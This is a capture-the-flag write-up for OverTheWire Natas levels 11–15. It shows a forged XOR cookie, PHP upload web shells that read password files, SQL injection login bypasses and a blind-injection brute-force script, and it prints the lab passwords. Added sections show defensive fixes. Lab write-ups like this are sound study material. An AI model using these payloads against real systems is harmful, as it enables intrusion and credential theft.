Wargames NATAS (11-15) problem solving essay
2022-07-24 08:26:00 【renu08】
Natas Level 10 → Level 11
Tips: The hint says the cookie is XOR-encrypted, so this level must involve cookies. Capturing the request shows a cookie value named data. Reading the source code shows that the password is printed as long as $data["showpassword"] == "yes". Tracing $data leads to $data = loadData($defaultdata);, and $defaultdata is $defaultdata = array("showpassword"=>"no", "bgcolor"=>"#ffffff");. loadData() takes the data value from the cookie, decrypts it and returns it as $data; saveData() is then called to set the cookie again. So the goal is to make $data["showpassword"] == "yes": generate the corresponding data value and substitute it for the original one. The script used to recover the key and build the new cookie is as follows:
<?php
// Cookie value captured from the browser (still URL-encoded: %3D is "=").
$data = "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSRwh6QUcIaAw%3D";
$defaultdata = array("showpassword" => "no", "bgcolor" => "#ffffff");
$value1 = json_encode($defaultdata);        // assumed plaintext
$value2 = base64_decode(urldecode($data));  // ciphertext
$outText = "";
// xor_encrypt: XOR the ciphertext with the assumed plaintext to get the key stream
for ($i = 0; $i < strlen($value1); $i++) {
    $outText .= $value1[$i] ^ $value2[$i % strlen($value2)];
}
echo $outText . "\n";
// Output: qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq!n'!nJq  (one non-printable byte not shown)
// xor_encrypt() XORs every byte of value1 with $key, so wherever the assumed
// plaintext is right the output is the key itself; the tail differs because the
// captured cookie's bgcolor was not the assumed "#ffffff".
// The value that repeats most often is the key: $key = "qw8J".
$outText = "";
$key = "qw8J";
$data2 = array("showpassword" => "yes", "bgcolor" => "#ffffff");
$value3 = json_encode($data2);
// xor_encrypt the new JSON with the recovered key
for ($i = 0; $i < strlen($value3); $i++) {
    $outText .= $value3[$i] ^ $key[$i % strlen($key)];
}
echo "cookie for \$data[\"showpassword\"] == yes: " . base64_encode($outText) . "\n";
// data=ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
?>
Then use Burp to replace the data value in the cookie, send the GET request, and the password is returned.
username: natas12
password: EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
Level cleared!
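The key recovery from the PHP script above, generalized in Python and paired with the fix. This is an added example, not code from the write-up: it uses only the part of the JSON that is certain from the level's source (the captured cookie's bgcolor turns out not to be the default "#ffffff", which is why the PHP output above is the key only for the first 33 bytes), finds the key by its repetition period, and then shows an HMAC-signed cookie that a server can verify; the secret value is constructed.

```python
import base64
import hashlib
import hmac
import json
from urllib.parse import unquote

# The URL-encoded cookie value captured on the page (%3D is "=").
COOKIE = "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSRwh6QUcIaAw%3D"
# Only this prefix of the JSON is certain from the source; the bgcolor value
# can be changed through the form, so it is not assumed.
KNOWN_PREFIX = b'{"showpassword":"no","bgcolor":"'


def xor(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the same operation as the level's xor_encrypt()."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(cookie: str, known_prefix: bytes) -> bytes:
    """Known-plaintext attack: ciphertext XOR plaintext gives the key stream;
    the shortest period that reproduces the stream is the key."""
    ct = base64.b64decode(unquote(cookie))
    stream = xor(ct[: len(known_prefix)], known_prefix)
    for period in range(1, len(stream) + 1):
        candidate = stream[:period]
        if xor(stream, candidate) == bytes(len(stream)):
            return candidate
    return stream  # no repetition: key is at least as long as the known prefix


def decrypt_cookie(cookie: str, key: bytes) -> dict:
    """What loadData() does on the server once the key is known."""
    return json.loads(xor(base64.b64decode(unquote(cookie)), key))


# Mitigation: XOR "encryption" without authentication can be forged once the
# key leaks; a MAC lets the server reject any cookie it did not issue itself.
def sign_cookie(data: dict, secret: bytes) -> str:
    body = base64.b64encode(json.dumps(data, separators=(",", ":")).encode()).decode()
    tag = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def load_signed_cookie(cookie: str, secret: bytes):
    body, _, tag = cookie.rpartition(".")
    expected = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None  # tampered or forged: the server falls back to its defaults
    return json.loads(base64.b64decode(body))
```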
Natas Level 11 → Level 12
Tips: Opening the page shows a file upload form. Reading the source code reveals the following flow.
Flow (suppose the file test.jpg is uploaded):
Client side
The page calls genRandomString() to generate a random file name ->
appends ".jpg" ->
puts it in the form's filename field, $_POST["filename"] (say xxd.jpg) ->
the form is POSTed to the index.php script ->
Server side
Receives the POST data and checks whether filename is present -> (it is) ->
calls makeRandomPathFromFilename("upload", "xxd.jpg") -> $ext = 'jpg' ->
calls makeRandomPath("upload", "jpg") -> "upload/xxb" + "." + $ext ->
the new path is returned as $target_path = "upload/xxb.jpg" ->
checks whether the uploaded file test.jpg exceeds 1 KB ->
calls move_uploaded_file() to move the file to $target_path -> the file is now on the server
Summary: With the flow clear, the file name is only replaced by a random one and the ".jpg" suffix is taken from the client's filename field unchanged; the file is then moved straight onto the server. The suffix is never validated and nothing is filtered,
so a PHP script can simply be uploaded. Create a file test.txt containing:
<?php
passthru ("cat /etc/natas_webpass/natas13");
?>
Then upload it, intercept the request with Burp, and change the .jpg suffix in the filename field to .php.
Forward the POST request; back on the main page the file shows as uploaded. Click the displayed link to execute the PHP script, and the password is printed directly.
username: natas13
password: jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY
Level cleared!
Natas Level 12 → Level 13
Tips: This level is roughly the same as the previous one, with one extra check: the uploaded file must be an image. So the idea is to embed the code in an image file and upload that to get past the image check.
Script file test.php:
<?php
passthru ("cat /etc/natas_webpass/natas14");
?>
Then run the following command:
cat test.jpg test.php > rr.jpg
This concatenates test.jpg and test.php into rr.jpg; note that the resulting rr.jpg must not exceed 1 KB.
Then upload the file, intercept it with Burp and, as in the previous level, change the .jpg suffix to .php.
Forward the POST request; back on the main page the file shows as uploaded. Click the displayed link to execute the PHP script, and the password is printed directly.
username: natas14
password: Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1
Level cleared!
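A hardened version of the upload path used by levels 12 and 13, as an added Python example rather than the levels' own PHP: the server ignores the client-supplied file name entirely, derives the extension from the file's magic bytes, and enforces the size limit. The sample bytes (a JPEG header with PHP text appended, like rr.jpg above) are constructed; the 1 KB limit is the one stated in the write-up.

```python
import os
import secrets

# Image types accepted, keyed by their leading magic bytes (the content check
# that level 13 adds on top of level 12's flow).
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
MAX_BYTES = 1000  # the levels' 1 KB limit, as stated in the write-up


def detect_image_type(data: bytes):
    """Extension implied by the file's magic bytes, or None if not an image."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def choose_target_path(upload_dir: str, client_filename: str, data: bytes):
    """Server-chosen path for an upload, or None to reject it.

    client_filename is accepted only to show that it is unused: in level 12
    the extension came from $_POST["filename"], which is what let .jpg become
    .php. Here the name is random and the extension follows the detected type.
    """
    ext = detect_image_type(data)
    if ext is None or len(data) > MAX_BYTES:
        return None
    return os.path.join(upload_dir, secrets.token_hex(8) + "." + ext)


# Constructed samples: a minimal JPEG header, that header with PHP source
# appended (the level 13 rr.jpg trick), and a bare PHP file.
JPEG_HEADER = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
POLYGLOT = JPEG_HEADER + b'<?php echo "constructed sample"; ?>'
PLAIN_PHP = b"<?php echo 1; ?>"

# The polyglot still passes the magic-byte check, so it is stored, but as
# <random>.jpg: the PHP text is never handed to the interpreter. Keeping the
# upload directory non-executable (or outside the web root) is the second layer.
```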
Natas Level 13 → Level 14
Tips: Opening the page shows a form; the page source shows it is submitted by POST. The analysis is as follows:
Flow:
username=natas15 password=
Client side
POST username and password to index.php
Server side
Accept the submitted data ->
call mysql_connect() to connect to the MySQL database -> on success returns the database link $link ->
call mysql_select_db() to select the database on $link ->
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
-> call mysql_query() to execute the SQL statement ->
call mysql_num_rows() to get the number of rows in the result set ->
if the return value is > 0, print the password ->
close the SQL connection
OK! With the flow clear, it is enough to construct a query that makes the row count greater than 0.
Original: $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
Modified: $query = "SELECT * from users where username=\"natas15\" -- \" and password=\"".$_REQUEST["password"]."\"";
The submitted query becomes: select * from users where username="natas15";
Log in with just the username and get the password.
username: natas15
password: AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J
Level cleared!
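The level 14 query rebuilt against an in-memory SQLite table, as an added Python example (not the level's code), with the parameter-bound version beside it. SQLite uses single-quoted string literals where the level's MySQL query used double quotes, so the payload closes a single quote; the same binding fixes the level 15 username check as well.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the level's MySQL users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('natas15', 'constructed-secret')")
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> bool:
    """The level 14 pattern: request values pasted straight into the SQL text,
    so a username ending in a quote and a comment marker rewrites the WHERE
    clause and the password check disappears from the query."""
    query = ("SELECT * from users where username='" + username
             + "' and password='" + password + "'")
    rows = con.execute(query).fetchall()
    return len(rows) > 0  # the level prints the password when this is true


def login_fixed(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Same query with bound parameters: the values are never parsed as SQL,
    so the quote and comment marker are just characters of a username that
    does not exist."""
    query = "SELECT * from users where username=? and password=?"
    rows = con.execute(query, (username, password)).fetchall()
    return len(rows) > 0


if __name__ == "__main__":
    con = make_db()
    payload = "natas15' -- "  # the write-up's payload, single-quoted for SQLite
    print("vulnerable:", login_vulnerable(con, payload, ""))
    print("fixed:     ", login_fixed(con, payload, ""))
```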
Natas Level 14 → Level 15
Tips: Opening the link shows only one form; the page source analysis is as follows.
Flow:
Client side
POST username to index.php
Server side
The server receives the POST data. The source shows that the username parameter is used as the query condition of a SQL statement; if the user exists the page prints "This user exists.", otherwise "This user doesn't exist.".
The password cannot be read directly, but the returned message can be used to brute-force it character by character. Write a script that POSTs automatically, reads the result, and appends each matched character until the whole password is assembled. The password has the same length as the previous levels' passwords and consists of upper- and lower-case letters and digits. I wrote the script in Python; any other scripting language works the same way.
The code is as follows:
import urllib.request
import urllib.parse
import re

url = 'http://natas15.natas.labs.overthewire.org/index.php'
headers = {
    'Host': 'natas15.natas.labs.overthewire.org',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://natas15.natas.labs.overthewire.org',
    # HTTP basic auth for natas15 (the password from the previous level)
    'Authorization': 'Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==',
    'Connection': 'keep-alive',
    'Referer': 'http://natas15.natas.labs.overthewire.org/',
    'Cookie': '__utma=176859643.1665848136.1639378791.1639816055.1639908270.13; __utmz=176859643.1639378791.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=176859643',
    'Upgrade-Insecure-Requests': '1'
}
dic = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
# username payload: close the string, then test the password prefix case-sensitively
n1 = 'natas16" and binary password like "'
n2 = '%"#'
# the password is as long as the previous level's
length = len('AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
pattern = re.compile(r'This user exists')
pwd = ''
for i in range(length):
    for ch in dic:
        name = n1 + pwd + ch + n2
        data = {'username': name}
        postdata = bytes(urllib.parse.urlencode(data), encoding='utf-8')
        print(postdata)
        req = urllib.request.Request(url=url, headers=headers, data=postdata, method='POST')
        response = urllib.request.urlopen(req)
        html = response.read().decode('utf-8')
        if pattern.search(html):  # prefix matched: keep the character and move on
            pwd += ch
            break
print(pwd)
Summary: The knowledge points of this level are:
- how to send a POST request in Python
- string concatenation in Python
- the Python re module
- the Content-Length header affects the response, so remove it
- LIKE in MySQL for fuzzy matching
- BINARY in MySQL for case-sensitive comparison
username: natas16
password: WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
Level cleared!